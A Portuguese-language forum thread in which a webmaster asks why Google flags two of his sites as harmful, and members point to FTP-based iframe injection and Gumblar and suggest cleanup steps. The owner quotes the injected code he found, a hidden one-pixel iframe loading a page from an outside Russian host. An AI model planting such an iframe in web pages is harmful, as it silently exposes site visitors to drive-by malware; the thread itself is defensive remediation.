← Segurança

"Aviso: Visitar este site poderá danificar o seu computador!"

Lida 4381 vezes

Offline

Diogo Oliveira 
Membro
Mensagens 1111 Gostos 3
Feedback +5

Troféus totais: 29
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3

Viva,

O aviso "Aviso: Visitar este site poderá danificar o seu computador!" está a aparecer em dois websites meus, que se encontram alojados na mesma conta de alojamento.

Alguma ideia de como e onde poderei encontrar o problema?

Cumprimentos e Obrigado.
Offline

Júnio Branco 
Membro
Mensagens 563 Gostos 0
Feedback +2

Troféus totais: 28
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

No google Webmasters tens la a opcao de procurar por codigos "malware"
Pode ser que também tenhas banners com iframes que estão são condiserados perigosos
Offline

magnatic 
Membro
Mensagens 175 Gostos 0
Feedback +6

Troféus totais: 23
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts

A forma mais fiável é vendo a source (código fonte) da página e procurar por código estranho.

Mas, o "Google" (a aliança é com mais algumas empresas mas o mais visível é o Google) tem dado muitos falsos positivos - aconteceu comigo.
O site não está registado no Webmasters Tools pois não?
É que a partir daí é possível fazer um pedido para remover o aviso do site se for um falso positivo ou se já estiver resolvido.
Offline

Diogo Oliveira 
Membro
Mensagens 1111 Gostos 3
Feedback +5

Troféus totais: 29
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3

Ainda não tinha reparado nessa ferramenta do Google... Já estou a tratar do assunto, já sei as páginas onde está a ocorrer e qual é o código:

Citar
<iframe src='http://z145235.infobox.ru/go.php?sid=2' width='
1' height='1' style='visibility: hidden;'>

Vou só investigar onde está isto... E já agora tentar perceber onde está a vulnerabilidade para isto ter acontecido, provavelmente plugins não actualizados.

Obrigado pela ajuda.
Offline

cjseven 
Administrador
Mensagens 1809 Gostos 26
Feedback +3

Troféus totais: 28
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1 1000 Posts

Esse tipo de infecção pode ocorrer por FTP.

http://ezinearticles.com/?IFRAME-Injection-Attacks-Via-FTP&id=2866289

Faz um scan ao teu pc e altera todas as passwords.
Offline

cenourinha 
Elite
Mensagens 4094 Gostos 21
Troféus totais: 34
Trófeus: (Ver todos)
Mobile User Apple User Level 6 Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4

Gumblar maybe... usas o FileZilla?
Offline

Diogo Oliveira 
Membro
Mensagens 1111 Gostos 3
Feedback +5

Troféus totais: 29
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3

Gumblar maybe... usas o FileZilla?

Yap
Offline

Migueis 
Membro
Mensagens 8 Gostos 0
Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 First Post Signature Karma Avatar

Tive clientes com esse mesmo problema.
Foi reparar o código e mudar as pass de FTP.
Depois tive que submeter novamente para apreciação do Google no webmaster tools.
Offline

Diogo Oliveira 
Membro
Mensagens 1111 Gostos 3
Feedback +5

Troféus totais: 29
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4 Level 3

É o que tenho estado a fazer... Se alguém estiver com o mesmo problema:

- Façam um scan ao PC;
- Verifiquem os ficheiros no FTP e procurem por iframes estranhos;
- Mudem a pass FTP após o PC estar limpo ou com outro PC;
- Peçam reapreciação na Google.